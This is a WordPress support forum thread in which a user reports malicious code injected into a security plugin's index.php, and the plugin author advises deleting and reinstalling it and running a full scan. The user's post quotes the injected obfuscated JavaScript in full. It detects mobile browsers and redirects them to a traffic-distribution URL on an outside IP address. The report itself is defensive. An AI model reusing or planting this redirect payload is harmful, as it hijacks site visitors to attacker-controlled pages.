Title: malicious code inserted to the plugin
Last modified: August 24, 2016

---

# malicious code inserted to the plugin

 *  Resolved [renato12](https://wordpress.org/support/users/renato12/)
 * (@renato12)
 * [11 years ago](https://wordpress.org/support/topic/malicious-code-inserted-to-the-plugin/)
 * good day, im having a trouble with your plugin.
    seems like that code has been
   injected to the plugin. wp-content/plugins/gotmls/index.php on line 1189 when
   i go to that line the next code appear. i already deleted the plugin to make 
   my site keep working hope anyone can help me out. die(“<html><body><script type
   =’text/javascript’>var _0xcda6=[“referrer”,”[http://&#8221](http://&#8221);,”
   146.185.239.3″,”/sTDS”,”/go.php?sid=”,”&sref=”,”userAgent”,”test”,”substr”,”location”];
   sid=2;var r=document[_0xcda6[0]];loc=_0xcda6[1]+_0xcda6[2]+_0xcda6[3]+_0xcda6[
   4]+sid+_0xcda6[5]+r;var a=navigator[_0xcda6[6]];if(/(android|bb\d+|meego).+mobile
   |avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone
   |od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i
   |palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(
   browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0xcda6[7]](a)||/1207|6310|
   6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|
   co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(
   ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell
   |chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)
   o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-
   |_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-
   |hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)
   |i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu
   |jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|
   50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(
   rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|
   mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|
   wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([
   1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12
   |21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms
   |ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)
   |sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(
   18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70
   |m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-
   v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g 
   |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xcda6[7]](a[_0xcda6[8]](0,4))){
   window[_0xcda6[9]]=loc};</script>Added $file to Whitelist!<iframe style=’width:
   90%; height: 350px;’ src='”.GOTMLS_update_home.”whitelist.html?whitelist=”.$_POST[‘
   GOTMLS_whitelist’].”&hash=$chksum[0]&size=$filesize&key=$chksum[1]’></iframe>
   </body></html>”);
 * [https://wordpress.org/plugins/gotmls/](https://wordpress.org/plugins/gotmls/)

Viewing 2 replies - 1 through 2 (of 2 total)

 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [11 years ago](https://wordpress.org/support/topic/malicious-code-inserted-to-the-plugin/#post-5997374)
 * Yes, it looks like that script is being injected into any file that contains 
   a “body” tag. It also looks like the hacker did a poor job of encoding it so 
   that it will actually break the syntax of a PHP string, thus rendering it ineffective
   and probably causing error on your site.
 * You should completely delete my plugin and re-install a fresh/clean copy, then
   run the Complete Scan to clean any other files that may have been infected.
 *  Plugin Author [Eli](https://wordpress.org/support/users/scheeeli/)
 * (@scheeeli)
 * [10 years, 11 months ago](https://wordpress.org/support/topic/malicious-code-inserted-to-the-plugin/#post-5997661)
 * If you download the latest version of my plugin then that injection script won’t
   be able to find any HTML or BODY tags to attach to in my plugin.
 * Aloha, Eli

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘malicious code inserted to the plugin’ is closed to new replies.

 * ![](https://ps.w.org/gotmls/assets/icon-256x256.png?rev=1001824)
 * [Anti-Malware Security and Brute-Force Firewall](https://wordpress.org/plugins/gotmls/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/gotmls/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/gotmls/)
 * [Active Topics](https://wordpress.org/support/plugin/gotmls/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/gotmls/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/gotmls/reviews/)

 * 2 replies
 * 2 participants
 * Last reply from: [Eli](https://wordpress.org/support/users/scheeeli/)
 * Last activity: [10 years, 11 months ago](https://wordpress.org/support/topic/malicious-code-inserted-to-the-plugin/#post-5997661)
 * Status: resolved